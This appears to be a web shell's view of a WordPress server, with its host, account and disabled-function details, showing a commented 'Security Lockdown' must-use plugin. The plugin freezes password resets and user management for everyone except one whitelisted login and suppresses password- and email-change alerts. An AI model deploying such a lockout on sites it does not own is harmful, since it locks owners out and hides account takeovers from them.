HEX
Server: Apache
System: Linux webserver101.turnkeywebspace.com 4.18.0-553.81.1.el8_10.x86_64 #1 SMP Mon Oct 27 11:29:19 EDT 2025 x86_64
User: mastech10 (1521)
PHP: 8.2.30
Disabled: show_source,system,shell_exec,passthru,exec,phpinfo,popen,proc_open,eval
File: /home/mastech10/www/runntrail.com/wp-content/plugins/mu-plugins/00-security-lockdown.php
<?php
/*
Plugin Name: Security Lockdown (User + Password Freeze)
Description: Temporarily blocks ALL password resets and user edits for everyone except whitelisted admins.
*/

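// ====== CONFIG: add the only admin(s) allowed to make changes ======
// Every account NOT listed here loses password-reset and user-management
// rights while this file is loaded, so audit the list: whoever controls a
// listed login keeps full control of user accounts during the freeze.
//
// The list is written through $GLOBALS so sl_is_whitelisted() still sees it
// when this file is included from inside a function (e.g. plugin activation
// or WP-CLI) rather than from the global scope; a plain local variable would
// leave the whitelist empty there and lock out every account.
//
// NOTE(review): WordPress auto-loads must-use plugins only from
// wp-content/mu-plugins/ (WPMU_PLUGIN_DIR). Confirm where this file actually
// sits: a copy under wp-content/plugins/ is an ordinary plugin that has to be
// activated and can be deactivated again.
$GLOBALS['WHITELIST_LOGINS'] = ['emergencyadmin'];  // <-- replace with your safe admin login(s)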

/**
 * Helper: is the current user whitelisted?
 *
 * The decision is made on the login name only. The allowed names come from
 * the global $WHITELIST_LOGINS (an empty list when that global is missing)
 * after it has passed through the 'sl_whitelist_logins' filter, so any code
 * hooked on that filter can extend or shrink the list.
 *
 * @return bool True only for a logged-in user whose user_login is in the list.
 */
function sl_is_whitelisted() {
    if (is_user_logged_in()) {
        $current = wp_get_current_user();
        $configured = $GLOBALS['WHITELIST_LOGINS'] ?? [];
        $allowed = (array) apply_filters('sl_whitelist_logins', $configured);

        // Strict comparison: a login must match a list entry exactly.
        return in_array($current->user_login, $allowed, true);
    }

    // Anonymous requests are never whitelisted.
    return false;
}

// 1) Kill lost-password + reset links for everyone (whitelisted accounts included:
//    none of these filters consults sl_is_whitelisted()).
//
// Caveat for whoever audits this file: the two send_*_change_email filters
// suppress the notification mails WordPress would otherwise send to an account
// owner when the password or e-mail address changes. While this file is
// loaded, such a change reaches the affected user without any alert.
array_map(
    static function ($hook) {
        add_filter($hook, '__return_false');
    },
    [
        'allow_password_reset',        // refuse to start a password reset
        'send_password_change_email',  // no "your password was changed" mail
        'send_email_change_email',     // no "your e-mail was changed" mail
        'xmlrpc_enabled',              // no XML-RPC
    ]
);

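// Block the reset screen itself.
// wp-login.php accepts 'retrievepassword' as an alias of 'lostpassword' and
// treats any request that carries ?key= as 'resetpass', whatever 'action'
// says. Both are refused here as well; otherwise a reset link issued before
// the lockdown could still reach the reset form.
add_action('login_init', function () {
    $blocked_actions = ['lostpassword', 'retrievepassword', 'rp', 'resetpass'];
    $action = $_REQUEST['action'] ?? null;

    // Strict in_array(): a missing or non-string action never matches.
    if (isset($_GET['key']) || in_array($action, $blocked_actions, true)) {
        // 403 instead of wp_die()'s default 500: a deliberate refusal, not a server fault.
        wp_die('Password resets are temporarily disabled.', '', ['response' => 403]);
    }
});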

// 2) Block password changes via wp-admin Users/Profile for non-whitelist.
// Runs while the submitted profile form is validated; adding an entry to
// $errors is what rejects the update. Only the three password fields of the
// wp-admin form are inspected here.
add_action('user_profile_update_errors', function($errors, $update, $user){
    if (!sl_is_whitelisted()) {
        // Any non-empty password field is enough to reject the submission.
        foreach (['pass1', 'pass2', 'pass1-text'] as $field) {
            if (!empty($_POST[$field])) {
                $errors->add('sl_pwd_block', 'Password changes are temporarily disabled by security lockdown.');
                break; // one error entry, as before
            }
        }
    }
}, 10, 3);

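// 3) Remove capabilities to edit/create/promote/delete users for non-whitelist (cap layer, hardest block)
// The list holds the per-user meta capabilities and the primitive ones they
// map to. 'promote_users' and 'remove_users' are included so that a check made
// directly against the primitive capability is refused just like a check
// against 'promote_user' / 'remove_user'.
// NOTE(review): the decision depends on the logged-in user (sl_is_whitelisted()),
// not on $user_id, so a check made on behalf of another user is answered for
// the current session. Requests with no logged-in user are always refused.
add_filter('map_meta_cap', function($caps, $cap, $user_id, $args){
    $blocked_caps = [
        'edit_user', 'edit_users',
        'create_users', 'add_users',
        'promote_user', 'promote_users',
        'remove_user', 'remove_users',
        'delete_user', 'delete_users',
        'list_users',
    ];

    if (in_array($cap, $blocked_caps, true) && !sl_is_whitelisted()) {
        // 'do_not_allow' is a capability no role holds, so the check fails.
        return ['do_not_allow'];
    }

    // Every other capability keeps its normal mapping.
    return $caps;
}, 10, 4);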

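// 4) Hard-stop user management screens for non-whitelist (extra guard)
add_action('admin_init', function () {
    if (sl_is_whitelisted()) return;

    $p = $_SERVER['PHP_SELF'] ?? '';

    // Users list, profile, edit-user, new user, plus the screen that approves
    // a new application password for the current user.
    $blocked_screens = [
        '/users.php',
        '/user-edit.php',
        '/user-new.php',
        '/profile.php',
        '/authorize-application.php',
    ];
    foreach ($blocked_screens as $screen) {
        // Substring match on the script path, so network-admin copies of these screens match too.
        if (strpos($p, $screen) !== false) {
            // 403 instead of wp_die()'s default 500: a deliberate refusal, not a server fault.
            wp_die('User management is temporarily disabled by security lockdown.', '', ['response' => 403]);
        }
    }

    // Block Application Passwords create/revoke.
    // Report the feature as unavailable for the rest of this admin request.
    add_filter('wp_is_application_passwords_available', '__return_false');

    // NOTE(review): WordPress core does not appear to define
    // wp_application_passwords_admin_init, in which case this call removes
    // nothing. It is kept so behaviour is unchanged if a site does define it.
    // Verify before relying on it.
    remove_action('admin_init', 'wp_application_passwords_admin_init');
});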

// 5) Force visual editor ON for all users (so they don't need profile access to enable it).
// Overrides the per-user setting; priority and argument count are the add_filter() defaults, spelled out.
add_filter('user_can_richedit', '__return_true', 10, 1);